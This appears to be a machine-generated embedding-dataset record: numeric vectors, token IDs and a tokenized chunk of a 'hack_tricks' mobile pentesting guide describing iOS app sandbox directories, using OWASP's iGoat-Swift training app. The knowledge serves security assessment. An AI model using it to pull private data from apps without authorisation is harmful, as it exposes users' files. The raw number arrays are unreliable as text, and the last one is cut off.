-0.06649304181337357, -0.6169788241386414, 0.5470740795135498, 1.0856757164001465, -0.90167236328125, 0.11436598002910614, -0.07934267073869705, -0.02674277126789093, 0.10811498016119003, -0.7802011966705322, -0.10531969368457794, 0.5073915123939514, 0.3264627456665039, 0.515081524848938, 0.4004512131214142, -0.00877517182379961, -0.06447300314903259, 0.4178723990917206, -0.4956684410572052, -0.4770742654800415, -0.3501587212085724, -0.17913073301315308, 0.23028810322284698, 0.03419340029358864, 0.03795214369893074, 0.6354692578315735, 0.49406698346138, 0.003095145570114255, -0.9130188226699829, 0.6824788451194763, 0.4616039991378784, 0.46714210510253906, 0.01579795964062214, 0.1791115403175354, -0.3861423432826996, -0.12407815456390381, 0.111879862844944, 0.3160260021686554, -0.11493945866823196, 0.3558103144168854, 0.221765398979187, -0.11659232527017593, -0.1407550871372223, 0.2068265825510025, 0.17483042180538177, 0.6422805190086365, 0.027601175010204315, 0.10952901095151901, 0.22795931994915009, 0.09282834827899933, -0.1413852870464325, 0.2913571298122406, -0.8383402228355408, -0.14427410066127777, 0.17160023748874664, -0.22670747339725494, 0.493799090385437, -0.19144195318222046, -0.04797293245792389, 0.40402674674987793, -0.3276057541370392, 0.03473764285445213, -0.1608114242553711, -0.5431005358695984, 0.2601872682571411, 1.0369725227355957, -0.8478463888168335, -0.2909272611141205, -0.5065452456474304, -0.13574127852916718, -0.4280628561973572, -0.9225894212722778, 0.2751138210296631, 0.7911786437034607, 0.08920978009700775, -0.2745896279811859, -0.6978108286857605, -0.22894611954689026, 0.22984163463115692, 0.11638835072517395, 0.17740511894226074, 0.13086913526058197, -1.2042839527130127, 0.8022522330284119, -0.07376546412706375, 0.23024077713489532, 0.048429228365421295, -0.015594040974974632, 0.20925161242485046, 0.13483469188213348, -0.49156299233436584, 0.5450863838195801, 0.31835412979125977, 0.2556038796901703, 0.33597734570503235, 0.39951634407043457, 0.2926847040653229, -0.5870519876480103, 0.00008247828372986987, 0.01253246795386076, 0.12441787868738174, 0.19633843004703522, 0.1542765498161316, -0.36668840050697327, 0.7291069626808167, 0.6935327053070068, -0.4874021112918854, 0.25594913959503174, 0.6323298215866089, -0.37379127740859985, -0.18692593276500702, -0.015811514109373093, 0.3181381821632385, -0.43715792894363403, 0.45132356882095337, -0.38301709294319153, -0.06077011302113533, 0.13922150433063507, -0.18447445333003998, 0.7002169489860535, 0.17801034450531006, 0.2559718191623688, -0.8425064086914062, 0.12435413151979446, -0.10554346442222595, 0.23671123385429382, -0.291684091091156, 0.18893752992153168, -0.805539071559906, 0.41593095660209656, 0.7846184372901917, 0.4787432551383972, -0.620736837387085, 0.2907616198062897, -0.6765011548995972, 0.47078680992126465, 0.46703633666038513, -0.24558092653751373, -0.7432309985160828, -0.07995421439409256, 0.3334195017814636, -0.17671772837638855, -0.5406021475791931, 0.2015550136566162, 0.5619102120399475, -0.010287291370332241, 0.8693693280220032, -0.6581993699073792, -0.20822517573833466, -0.5471484661102295, -0.2542278468608856, 0.005064649973064661, 0.3621353805065155, 0.38532260060310364, -0.5805150270462036, -0.548180878162384, 0.6008238792419434, 0.44276559352874756, 0.26469385623931885, 0.18763305246829987, 0.6077264547348022, -0.0376482792198658, 0.4160146117210388, 0.7243981957435608, 0.22180067002773285, -0.4872843027114868, -0.25832241773605347, -0.0950523093342781, -0.255092978477478, 0.196343794465065, -0.3338375389575958, 0.6028822660446167, -0.32641705870628357, -0.12691481411457062, -0.6527007818222046, 0.3926433026790619, -0.4038056433200836, -0.7794703841209412, 0.242033913731575, 0.026378648355603218, -0.5136112570762634, -0.30668869614601135, 0.1445571631193161, 0.18714472651481628, 0.8029834628105164, -0.3957858979701996, -0.5625596642494202, -0.01466266717761755, 0.22214922308921814, -0.13146091997623444, 0.9923474788665771, -0.7147871255874634, 0.06316645443439484, -0.43506044149398804, -0.978962779045105, -0.4332723021507263, -0.22638902068138123, -0.07016052305698395, -0.42451074719429016, 0.24622011184692383, 0.3477964401245117, 0.04616384208202362, 0.5277843475341797, -0.5549198389053345, -0.5077893733978271, -0.06336751580238342, 0.7762276530265808, -0.10154321789741516, 1.0169590711593628, 0.38348573446273804, -0.3851016163825989, 0.15712763369083405, -0.2709812521934509, 0.6254290342330933, -0.48880255222320557, -0.026374733075499535, 0.46173709630966187, 0.022373031824827194, -0.44963693618774414, -0.38640615344047546, -0.35343292355537415, -0.09898608922958374, 0.6014474034309387, -0.13230492174625397, -1.1329106092453003, -0.5496587753295898, -0.607058048248291, 0.4879474937915802, 0.09360676258802414, -0.4776597321033478, 0.6453805565834045, -0.15772970020771027, 0.3521239161491394, -1.0475481748580933, 4.500097274780273, 0.5876955389976501, 0.06376878917217255, 0.4759156107902527, -0.07426542788743973, 0.3055000305175781, 1.4521223306655884, -0.321002334356308, -0.12802034616470337, -0.6911250352859497, 0.13549919426441193, -0.3407546281814575, 0.5925142765045166, 0.8601741790771484, 0.6029283404350281, 0.45954081416130066, -0.4813656508922577, 0.3221984803676605, 0.19161240756511688, -0.7565389275550842, -1.4555425643920898, -0.1414472758769989, 0.15613685548305511, 0.8997095227241516, 0.39619380235671997, 0.11321458220481873, 0.047799140214920044, -0.6330735087394714, -0.5632886290550232, -0.22539788484573364, 0.3064897060394287, -0.5907802581787109, 0.3221556544303894, -0.4644739627838135, -0.16369511187076569, -0.19328385591506958, 0.3251051604747772, -0.6856363415718079, -0.4315478801727295, -0.1549428254365921, -0.26369598507881165, -0.20374809205532074, -0.03713548555970192, -0.5709743499755859, 0.24698953330516815, 0.5765834450721741, -0.6124402284622192, -0.14618493616580963, 0.14136046171188354, -0.8332676887512207, 0.4254239499568939, 0.4009878933429718, 0.7118666768074036, 0.17556153237819672, -0.2565300166606903, 0.19714154303073883, 0.5799484252929688, -0.11050400882959366, 0.013765598647296429, -0.405448853969574, 0.48228561878204346, -0.8245866298675537, 0.004154611378908157, -0.0035575665533542633, -0.7268412709236145, 0.36601322889328003, -0.44838955998420715, -0.015010179951786995, -0.14474943280220032, -0.6786861419677734, -0.32850149273872375, 0.035721272230148315, -0.37881922721862793, -0.7543027400970459, 0.8024744987487793, -0.2207511067390442, 0.14357499778270721, 0.12672677636146545, -0.10199375450611115, -0.166218101978302, -0.08828732371330261, -0.5664912462234497, -1.4889531135559082, 0.5592470169067383, 0.7489983439445496, 0.6044440269470215, -0.0333615280687809, -0.671891450881958, 0.37864571809768677, 0.037728406488895416, 0.17236652970314026, 0.19771404564380646, -0.269803524017334, 0.008356161415576935, 0.44395363330841064 ]
[ 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 1011, 14012, 15069, 1013, 13075, 1013, 16143, 1013, 14012, 1013, 4646, 1013, 23842, 2850, 2546, 22610, 2094, 1011, 1037, 2581, 22022, 1011, 4749, 7011, 1011, 1038, 22907, 2549, 1011, 1042, 9818, 2050, 28756, 27814, 2683, 2063, 2575, 2581, 1013, 1045, 3995, 4017, 1011, 9170, 1012, 10439, 3540, 8376, 4305, 2890, 16761, 2100, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1022, 2278, 2620, 2063, 2581, 15878, 2692, 1011, 4647, 2683, 2497, 1011, 24125, 2497, 1011, 1022, 12879, 2620, 1011, 1022, 2546, 24087, 16086, 15878, 2692, 2575, 2683, 2509, 1013, 3075, 1013, 17053, 16150, 10085, 27417, 2102, 4305, 2890, 16761, 2100, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1022, 2278, 2620, 2063, 2581, 15878, 2692, 1011, 4647, 2683, 2497, 1011, 24125, 2497, 1011, 1022, 12879, 2620, 1011, 1022, 2546, 24087, 16086, 15878, 2692, 2575, 2683, 2509, 1013, 5491, 29521, 19848, 25688, 7442, 16761, 2100, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1022, 2278, 2620, 2063, 2581, 15878, 2692, 1011, 4647, 2683, 2497, 1011, 24125, 2497, 1011, 1022, 12879, 2620, 1011, 1022, 2546, 24087, 16086, 15878, 2692, 2575, 2683, 2509, 1013, 3075, 29337, 2071, 2036, 3945, 2005, 1996, 10439, 2171, 2503, 1013, 2797, 1013, 13075, 1013, 16143, 1024, 2424, 1013, 2797, 1013, 13075, 1013, 16143, 1011, 2171, 1000, 4013, 16989, 4168, 1008, 1000, 2030, 2478, 8827, 1998, 1048, 6499, 2546, 1024, 8827, 1011, 1041, 2546, 1064, 24665, 13699, 1011, 1045, 1026, 10439, 1011, 2171, 1028, 1048, 6499, 2546, 1011, 1052, 1026, 14255, 2094, 1028, 1064, 24665, 13699, 1011, 1045, 1000, 1013, 16143, 1000, 1064, 2132, 1011, 1050, 20720, 2015, 2017, 2064, 2156, 1010, 18726, 2031, 2048, 2364, 5269, 1024, 1996, 14012, 14176, 1006, 1013, 13075, 1013, 16143, 1013, 14012, 1013, 4646, 1013, 23842, 2850, 2546, 22610, 2094, 1011, 1037, 2581, 22022, 1011, 4749, 7011, 1011, 1038, 22907, 2549, 1011, 1042, 9818, 2050, 28756, 27814, 2683, 2063, 2575, 2581, 1013, 1007, 1012, 1996, 2951, 14176, 1006, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1022, 2278, 2620, 2063, 2581, 15878, 2692, 1011, 4647, 2683, 2497, 1011, 24125, 2497, 1011, 1022, 12879, 2620, 1011, 1022, 2546, 24087, 16086, 15878, 2692, 2575, 2683, 2509, 1013, 1007, 1012, 2122, 19622, 2015, 5383, 2592, 2008, 2442, 2022, 8920, 4876, 2076, 4646, 3036, 20794, 1006, 2005, 2742, 2043, 20253, 1996, 8250, 2951, 2005, 7591, 2951, 1007, 1012, 14012, 14176, 1024, 10439, 18442, 1012, 10439, 15222, 2015, 2003, 1996, 4646, 14012, 2004, 2464 ]
hack_tricks
43.txt
4
before in the ipa, it contains essential application data, static content as well as the application's compiled binary. this directory is visible to users, but users can't write to it. content in this directory is not backed up. the contents of this folder are used to validate the code signature. data directory : documents / contains all the user - generated data. the application end user initiates the creation of this data. visible to users and users can write to it. content in this directory is backed up. the app can disable paths by setting nsurlisexcludedfrombackupkey. library / contains all files that aren't user - specific, such as caches, preferences, cookies, and property list ( plist ) configuration files. ios apps usually use the application support and caches subdirectories, but the app can create custom subdirectories. library / caches / contains semi - persistent cached files. invisible to users and users can't write to it. content in this directory is not backed up. the os may delete this directory's files automatically when the app is not running and storage space is running low. library / application support / contains persistent files necessary for running the app. invisible to users and users can't write to it. content in this directory is backed up. the app can disable paths by setting nsurlisexcludedfrombackupkey. library / preferences / used for storing properties that can persist even after an application is restarted. information is saved, unencrypted, inside the application sandbox in a plist file called [ bundle _ id ]. plist. all the key / value pairs stored using nsuserdefaults can be found in this file. tmp / use this directory to write temporary files that don't need to persist between app launches. contains non - persistent cached files. invisible to users. content in this directory is not backed up. the os may delete this directory's files automatically when the app is not running and storage space is running low. let's take a closer look at igoat - swift's application bundle (. app ) directory inside the bundle directory ( / var / containers / bundle / application / 3adaf47d - a734 - 49fa - b274 - fbca66589e67 / igoat - swift. app ) : owasp. igoat - swift
[ 0.20873510837554932, -0.47761571407318115, 0.18312062323093414, 0.6440673470497131, -0.2497977465391159, 0.295110285282135, 0.23533092439174652, -0.7044492959976196, 0.21293164789676666, 0.6077101826667786, -0.1701890230178833, -0.4467744529247284, 0.07727702707052231, -0.3709392547607422, -0.6923721432685852, -0.613126277923584, -0.3076138496398926, 0.32896384596824646, -0.9065806865692139, -0.02255668304860592, 0.4752180576324463, 0.29963618516921997, -0.4114176332950592, -0.49681952595710754, -0.28727954626083374, 0.7439438104629517, 0.22952471673488617, 0.2553469240665436, 0.19088596105575562, 0.6748660206794739, -0.22926504909992218, 0.18712183833122253, -0.25271210074424744, -0.32952654361724854, 0.279263973236084, 0.3814983367919922, 0.9906938672065735, -0.19966234266757965, 0.34062957763671875, -0.4383750855922699, 0.7230324745178223, -0.45485424995422363, 0.2761625349521637, -0.35907766222953796, -0.5672795176506042, -0.34517383575439453, 0.10578066110610962, -0.1089637503027916, 0.650381863117218, -0.43331798911094666, 0.5266652703285217, -0.03132821246981621, 0.22148995101451874, 0.04858720675110817, 0.3124602437019348, -0.23569367825984955, 0.10708052664995193, 0.2026456892490387, -0.11757127940654755, 0.41881686449050903, -0.5071796774864197, 0.08103839308023453, -0.07373576611280441, -0.5596067309379578, -0.0032037978526204824, 0.3133028447628021, -0.17998620867729187, 0.03866773098707199, -0.28768667578697205, -0.2181653529405594, -0.20806823670864105, 0.2143893539905548, -0.4256657660007477, -0.6524982452392578, -0.6450294256210327, -0.45275357365608215, 0.04972397908568382, -0.38686829805374146, -0.19544166326522827, 0.48058098554611206, -0.41217005252838135, 0.5646515488624573, 0.2859983444213867, 0.3029765784740448, -0.15690377354621887, -0.028617538511753082, 0.475351482629776, 0.28215381503105164, -0.11244125664234161, -0.021031154319643974, 0.1493254452943802, 0.17945735156536102, -0.21167431771755219, -0.5552822947502136, 0.016603466123342514, 0.7719469666481018, -0.1957472413778305, 0.11858128756284714, 0.0851399376988411, -0.48576638102531433, 0.4046114981174469, 1.1961989402770996, 0.44980862736701965, 0.9607373476028442, -0.13167481124401093, 0.44155174493789673, 0.4156433343887329, -0.5056708455085754, -0.6060464382171631, -0.16625887155532837, 0.47666189074516296, -0.011262870393693447, 0.11591145396232605, -0.9790627956390381, -0.42304641008377075, 0.37661826610565186, 0.3739786744117737, 0.23247498273849487, -0.22021381556987762, 0.5810620188713074, 0.13894693553447723, -0.4551161825656891, 0.3441595137119293, -0.5819676518440247, -0.5588933229446411, 0.1513921022415161, -0.02431344985961914, 0.6461900472640991, -0.2550530731678009, -0.7177720069885254, -0.5746905207633972, -0.29602953791618347, -0.10446583479642868, 0.47690263390541077, -0.8473829627037048, 0.08109323680400848, 0.7973024845123291, -0.08914244920015335, 0.6819746494293213, -0.5983504056930542, 0.03811740502715111, 0.05092692747712135, 0.07372542470693588, 0.713835597038269, -0.183563232421875, 0.10465174168348312, -0.39474934339523315, -0.21199370920658112, -0.4906860589981079, 0.45840492844581604, -0.38305968046188354, 0.6415597796440125, 1.082737922668457, -0.5972056984901428, -0.5657514333724976, -0.07334133982658386, -0.12733244895935059, 0.4917241930961609, -0.12498636543750763, -0.1833893060684204, -0.5347891449928284, 0.4927661120891571, 0.4582810699939728, -0.08384577929973602, -0.06961378455162048, 0.4444712698459625, -0.7974002361297607, -0.5780301094055176, -0.5540392398834229, 0.09479788690805435, 0.3833473026752472, 0.0928821861743927, 0.1240583211183548, 0.04790467768907547, 1.1583255529403687, 0.7445868849754333, 0.3174035847187042, -0.24503359198570251, 0.056794729083776474, 0.0455913282930851, -0.6492025852203369, -0.1649249941110611, 0.20617112517356873, 0.3916914165019989, -0.5003471374511719, 0.4638267755508423, -0.852503776550293, -0.8612276315689087, -0.6599394083023071, 0.02673714980483055, -0.5432105660438538, 0.6927511692047119, -0.5835469961166382, 0.4192756116390228, 0.41214391589164734, -0.38320696353912354, -1.276685357093811, -0.33595696091651917, -0.08296490460634232, -1.2468030452728271, -0.9030147790908813, -0.30580681562423706, 0.11792208254337311, 0.04322269558906555, -0.4158782660961151, 0.2058258354663849, 0.8550183773040771, 0.723029613494873, 0.11582634598016739, 0.7021981477737427, 0.7978341579437256, -0.4070678651332855, -0.6289108991622925, -0.016448622569441795, -0.10868419706821442, -0.23946063220500946, -0.36325016617774963, 0.2863077223300934, -0.3344143033027649, 0.029263073578476906, -0.7196524143218994, 0.53786301612854, 0.5314514636993408, 0.2021041363477707, -0.24890531599521637, 0.41820845007896423, 0.11676464974880219, 0.28388774394989014, -0.2784494161605835, -0.22815778851509094, -0.2049434781074524, 0.951657772064209, 0.2570086419582367, 0.7218595743179321, 0.11420655250549316, 0.286115437746048, 0.15276630222797394, 0.05380639806389809, -0.19656702876091003, -0.24396714568138123, -0.13869361579418182, 0.9137421250343323, 0.4976569712162018, 0.22219568490982056, 0.5766158103942871, 0.05289513245224953, -0.008450539782643318, 0.3973691165447235, 0.17999497056007385, 0.7799493670463562, -0.48002761602401733, 0.5324897170066833, 0.8681553602218628, -0.2137371450662613, -0.681850790977478, -0.7653705477714539, 0.462512344121933, 0.7658584713935852, -0.8014428019523621, -0.5255756974220276, 0.33284562826156616, 0.38604187965393066, 0.3904889225959778, -0.018202414736151695, -0.07591687887907028, 0.7548459768295288, 0.5208585858345032, -0.08128947764635086, -0.4596439003944397, -0.4469452500343323, -0.7574348449707031, -0.2979987561702728, -0.4622870087623596, -0.31773293018341064, -0.79010409116745, 0.2987992465496063, 0.32248181104660034, -0.8159640431404114, 0.8711705803871155, -0.8564192056655884, -0.37597861886024475, 0.49856194853782654, 0.35019490122795105, 0.23060490190982819, -0.3898613750934601, 0.40176525712013245, -1.1131314039230347, 0.40550991892814636, 0.14553122222423553, 0.28174635767936707, -0.39210742712020874, -0.15814389288425446, -0.08170443028211594, -0.4123256802558899, -0.15371613204479218, -0.96593177318573, 1.1492712497711182, -0.06118931993842125, 0.258383572101593, -0.20630761981010437, 0.18684172630310059, 0.009018579497933388, -0.19997873902320862, -0.28504419326782227, -0.5528395771980286, 0.5451661944389343, -0.18277043104171753, 0.3712419867515564, 0.7412329316139221, 0.2687315344810486, -0.5974195003509521, 0.15644675493240356, 0.2725662887096405, 0.06851416826248169, -0.5853080153465271, 0.6474222540855408, 0.5255523324012756, 0.14904126524925232, -0.0204557403922081, -0.22053401172161102, 0.2576221227645874, -0.2010127305984497, -0.2918098270893097, -0.3657493591308594, -0.24064332246780396, 0.10600795596837997, -0.2530798316001892, -0.8453279137611389, 0.21946370601654053, -0.5722450613975525, -0.7171308398246765, -0.2539803385734558, 0.036613382399082184, 0.8696417212486267, -0.17897763848304749, 0.2859465181827545, 0.15472348034381866, -0.1553664356470108, 0.8142238855361938, 0.399465948343277, 0.3305080831050873, -0.41021692752838135, 0.07021340727806091, 0.19249776005744934, -0.2753533720970154, 0.5076661705970764, 0.517797589302063, 0.07960908114910126, -0.23001240193843842, -0.20730610191822052, -0.4350488781929016, 0.1750335842370987, 0.6336319446563721, 0.42366835474967957, 0.366691917181015, 0.3069019615650177, -0.5698965191841125, -0.11569494754076004, -0.1268952339887619, 0.023274613544344902, 0.6162521243095398, 0.22443696856498718, 0.1848030686378479, -0.09487926214933395, -0.46884027123451233, -0.6432543992996216, -0.4156321585178375, 0.193630650639534, 0.14167073369026184, -0.20178553462028503, 0.5955709218978882, -0.4769415855407715, 0.45376965403556824, 0.3749772310256958, -0.33761775493621826, -0.3936896324157715, 0.9398779273033142, -0.18587148189544678, 0.4265131652355194, -0.5704213380813599, 0.6658705472946167, -0.015059083700180054, -0.32103806734085083, 0.5396357178688049, 0.257917195558548, 0.35246047377586365, -0.22471074759960175, -0.12100853025913239, -0.1498606652021408, -0.32701194286346436, 0.2464599758386612, -0.22145402431488037, -0.3959546387195587, -0.2835083305835724, -0.5125769972801208, -0.6890782117843628, 0.3620414137840271, 0.5807742476463318, 0.7741156220436096, 0.2680234909057617, 0.7850467562675476, 0.41622599959373474, -0.2330067753791809, -0.05310586094856262, -0.4891907572746277, -0.15301916003227234, 0.29457035660743713, 0.9975016713142395, -0.21412426233291626, 0.2631269693374634, -0.2897709012031555, -0.2447664886713028, -0.6769625544548035, -0.4173221290111542, -0.09283250570297241, 0.7283786535263062, -0.7656503319740295, -0.25637584924697876, -0.1358913779258728, -0.014135144650936127, -0.5631718635559082, -0.047192953526973724, 0.20454919338226318, 0.8593273162841797, 0.6760395169258118, -0.3954237997531891, 0.022265920415520668, 0.10327601432800293, 0.03057681955397129, 0.362721711397171, 0.07704872637987137, -0.09404449164867401, -1.1280722618103027, 0.291246622800827, -0.3426908254623413, 0.22428931295871735, 0.08249388635158539, 0.12402418255805969, 0.35943204164505005, -0.8775142431259155, -0.17844261229038239, 0.9090284705162048, -0.7141210436820984, -0.486385703086853, -0.1458328366279602, 0.22166414558887482, 0.45610350370407104, 0.5456846952438354, -0.21717555820941925, -0.2571406960487366, 0.2350415736436844, -0.35752663016319275, 0.539091944694519, -0.5883595943450928, 0.1644115000963211, 0.4444507360458374, -0.23480235040187836, -0.2844650447368622, 0.08779449760913849, -0.4906415045261383, 0.7298354506492615, 0.14645497500896454, -0.06437569111585617, -0.1737993359565735, -0.15797892212867737, 1.2561845779418945, -0.7718079090118408, -0.15480384230613708, 0.34185725450515747, 0.3233155906200409, -0.15264210104942322, -0.014913680031895638, -0.29961323738098145, -0.817999005317688, 0.8163532614707947, -0.6348085999488831, 0.7313445210456848, -0.47404107451438904, 0.09636423736810684, 0.04914260655641556, 0.12354766577482224, 0.530856728553772, -0.48874688148498535, 0.13053297996520996, -0.8710623383522034, -0.38736432790756226, -0.16214898228645325, 0.47997426986694336, -0.4006398022174835, 0.6835086941719055, 0.02456548996269703, -0.554349958896637, -0.32506290078163147, 0.023891061544418335, -0.6281173229217529, -0.7862762808799744, -0.2850552201271057, -0.2359955608844757, -0.23150593042373657, -0.2928486168384552, 0.37603962421417236, -0.26386818289756775, -0.6392409205436707, 0.5501396059989929, 0.048425883054733276, 0.22753962874412537, -0.6533668041229248, 0.3164313733577728, -0.0498131699860096, -0.03943163529038429, 0.10353178530931473, -0.16954070329666138, -0.06172242760658264, 0.19827578961849213, 0.43918493390083313, 0.6452746391296387, 0.7927895188331604, -0.3883191645145416, -0.6190330386161804, 0.23207420110702515, 0.7612213492393494, -0.09584659337997437, 0.18344706296920776, 0.8472260236740112, -0.5006484389305115, -0.32273170351982117, -0.29747647047042847, -0.5355256199836731, -0.2552897334098816, -0.1866530030965805, 0.7119966149330139, -0.38562875986099243, 0.31919240951538086, -0.535598874092102, -0.6397669911384583, -0.1289360523223877, 0.3576646149158478, 0.07298972457647324, -0.8707515001296997, 0.12185783684253693, 0.27041926980018616, 0.014741092920303345, -0.18439167737960815, 0.24733121693134308, -0.6788285970687866, -0.023999392986297607, -0.37572625279426575, 0.8860380053520203, -0.3516257703304291, -0.20572437345981598, 0.013392195105552673, 0.06039856746792793, 0.6265767216682434, 0.3325363099575043, -0.7931896448135376, -0.17263752222061157, -0.19487613439559937, -0.13036814332008362, 0.1346912831068039, 0.6463971734046936, -0.621250331401825, 0.3427698612213135, -0.38423314690589905, -0.619490385055542, 0.40057373046875, -0.1046905443072319, -0.10515052825212479, 0.42377617955207825, 0.5700464248657227, -0.564906656742096, -0.01778561621904373, -0.35440972447395325, 0.36947232484817505, -0.11690805107355118, -0.3985636830329895, -0.5639816522598267, 0.15797565877437592, -0.5832590460777283, -1.1253865957260132, 0.2993563711643219, -0.28384432196617126, -0.3095875084400177, 0.10108586400747299, -0.4038131833076477, 0.48928102850914, -0.40134528279304504, -0.025462254881858826, 1.232213020324707, 0.3576119840145111, 0.09427397698163986, -0.39559194445610046, 0.43722766637802124, 0.1025761291384697, -0.3348945081233978, -0.035659559071063995, -0.4083905518054962, -0.5585498809814453, -0.12463487684726715, -0.18061970174312592, -0.029982272535562515, -1.0047487020492554, 0.12063158303499222, 0.44434410333633423, 0.14880864322185516, 0.3546503484249115, 0.3222507834434509, -0.11809439212083817, 0.25074851512908936, 0.14971719682216644, -0.5946511626243591, -0.37589171528816223, 0.7170841097831726, -0.0043471273966133595, -0.18548952043056488, -0.14317549765110016, -0.07649637758731842, -0.4259549081325531, -0.5293044447898865, 0.3882124722003937, -0.11743025481700897, -0.4327143430709839, 0.8449544310569763, -0.1362558901309967, -0.9746700525283813, -0.16051308810710907, 0.010536625981330872, -0.3055099546909332, 0.3841667175292969, -0.5870356559753418, 0.047495193779468536, 0.88660728931427, -0.7202709317207336, -0.17724554240703583, -0.0933961272239685, 0.7175033688545227, 0.10297837108373642, -0.2748308777809143, 0.5483340620994568, 0.22362788021564484, -0.009237959049642086, 0.9537094235420227, -1.0067812204360962, -0.43308937549591064, -0.6702514290809631, -0.31614404916763306, -0.31698471307754517, -0.08166515082120895, 0.8542934656143188, -0.4796588718891144, -0.083315908908844, -0.16089411079883575, 0.19192323088645935, 0.22455309331417084, 0.4023211896419525, 0.17697648704051971, 0.8966711759567261, 0.6553476452827454, -0.36495330929756165, 0.019868331030011177, 0.5210170745849609, 0.05948013812303543, 0.12618160247802734, -0.6175701022148132, 0.13205313682556152, -0.35858240723609924, 0.18449144065380096, -0.2514832615852356, -0.6439346671104431, -0.7717050313949585, -0.6719493269920349, -0.31399357318878174, 0.008586796000599861, -0.8591919541358948, -0.3788807690143585, 0.24517373740673065, 0.017645813524723053, -0.8380430340766907, -0.5237956047058105, 0.7160770297050476, -0.6284786462783813, 0.5946387052536011, -0.859931468963623, 0.6418322920799255, -0.6153884530067444, -0.06595215946435928, -0.572939395904541, -0.3586072623729706, -0.3090011775493622, -0.23202280700206757, -0.609994113445282, -0.13862261176109314, -0.9077831506729126, 0.3514024019241333, -0.5143570899963379, -0.07685505598783493, -0.24048542976379395, -0.4015858769416809, 0.31531742215156555, 0.7680138349533081, -0.4078526496887207, -0.17143194377422333, 0.4159386456012726, 0.06905701756477356, 0.30831900238990784, -0.6496561169624329, -0.10799314826726913, 0.06932074576616287, 0.19098742306232452, 0.1406908482313156, -0.04862716421484947, 0.0661127120256424, -0.1957453042268753, 0.8916043043136597, -0.8764395117759705, -0.7405267357826233, -0.7052229046821594, 0.3951197564601898, 0.5266991257667542, -0.126912459731102, -0.09074687957763672, 1.1430920362472534, -0.041947152465581894, 0.17323815822601318, -0.6240021586418152, 0.2594948709011078, 0.9207713007926941, -0.017617324367165565, 0.022178221493959427, 0.3623811602592468, 0.1604120284318924, -0.3332017958164215, -0.49220770597457886, -0.1793975830078125, -0.8142804503440857, 0.011671464890241623, -0.14770837128162384, 0.19120587408542633, -0.5332779884338379, -0.19652636349201202, 0.14805583655834198, 0.598531186580658, 0.7457208633422852, 0.27496537566185, 0.2773658335208893, -0.27609527111053467, -0.457228422164917, 0.04409009590744972, -0.5391509532928467, -0.2224697321653366, 0.3202005624771118, -0.08009903132915497, -0.44090980291366577, -0.6843653917312622, -0.07366852462291718, 0.1688188910484314, 0.16019712388515472, 0.24302905797958374, -0.22063688933849335, -0.49703800678253174, -0.35599860548973083, 0.8762277960777283, -0.054518893361091614, -0.1974145621061325, 0.03933992236852646, 0.21218132972717285, -0.9233047962188721, -0.6736963391304016, 0.5330333113670349, 0.8683584928512573, 0.2707841694355011, -0.3982541561126709, -0.1905703842639923, 0.055768027901649475, 0.4583274722099304, -0.15791235864162445, 0.7054547071456909, 0.06568848341703415, -0.17967009544372559, 0.5012781023979187, -0.3815469741821289, 0.8506916761398315, -0.14622390270233154, 0.23551709949970245, 0.5294100642204285, -0.23414921760559082, -0.05692821741104126, 0.2222418189048767, 0.2023622989654541, 0.19512702524662018, 0.3540485203266144, 0.2737637162208557, 0.26108166575431824, -0.7578966617584229, -0.0132292490452528, -0.3596791625022888, -0.0925096794962883, 1.0935052633285522, 0.02940048836171627, -0.4513505697250366, 0.608576774597168, 0.6290125250816345, -0.2848460078239441, -0.1687619835138321, 0.7502910494804382, 0.29502686858177185, -0.1907341033220291, 0.49653178453445435, 0.3741825222969055, -0.4153752326965332, 0.053650908172130585, -0.45042526721954346, 0.39033859968185425, 0.05606428161263466, 0.0278680007904768, -0.14396317303180695, -0.24704773724079132, 0.910457193851471, -0.30417242646217346, 0.04442695528268814, 0.17494848370552063, 0.19628755748271942, 0.26355478167533875, -0.32711780071258545, -0.6410192251205444, 0.6096293330192566, 0.46543988585472107, 0.37870317697525024, 0.07883749157190323, 0.6925063133239746, -0.24393847584724426, 0.18949393928050995, 0.25925910472869873, 0.044940538704395294, -0.6563043594360352, 0.12896397709846497, 0.24073593318462372, -0.7731695175170898, -0.356364905834198, 0.09557975083589554, 0.346082866191864, -0.15567898750305176, 0.21377375721931458, -0.5523389577865601, -0.025309983640909195, -0.4775012135505676, 0.43808513879776, -0.5037625432014465, 0.42562955617904663, 0.280129075050354, -0.33205538988113403, -0.3456900417804718, 0.7835685610771179, 0.03258326277136803, 0.3314976692199707, -0.19882908463478088, 0.3131723403930664, 0.33459845185279846, 0.15731504559516907, 0.030583517625927925, -0.2925874590873718, 0.18396307528018951, -0.11928285658359528, -0.020909607410430908, -0.4807532727718353, -0.11981843411922455, -0.16021187603473663, 0.3442617654800415, 0.18762953579425812, -0.10514850914478302, -0.6501665711402893, -0.11647100001573563, -0.5399776697158813, -0.7080746293067932, 0.5636296272277832, 0.3681355118751526, -0.28361088037490845, -0.05469924211502075, 0.1018897071480751, 0.12626072764396667, 0.46356919407844543, -0.6902146935462952, -0.37153950333595276, -0.12869510054588318, -0.08599413931369781, 0.3710388243198395, 0.8540597558021545, -0.5707061290740967, 0.06599736958742142, 0.27501311898231506, -0.6134248971939087, -0.6200048327445984, 0.11588392406702042, -0.13303019106388092, -0.3452226519584656, 0.8065744042396545, -0.021916288882493973, 0.5235242247581482, 0.48654448986053467, -0.31210586428642273, -0.4229767322540283, 0.061242830008268356, 0.8410094976425171, 0.06188509613275528, 0.8774183392524719, 0.2973507046699524, 0.5350344181060791, 0.2200145572423935, 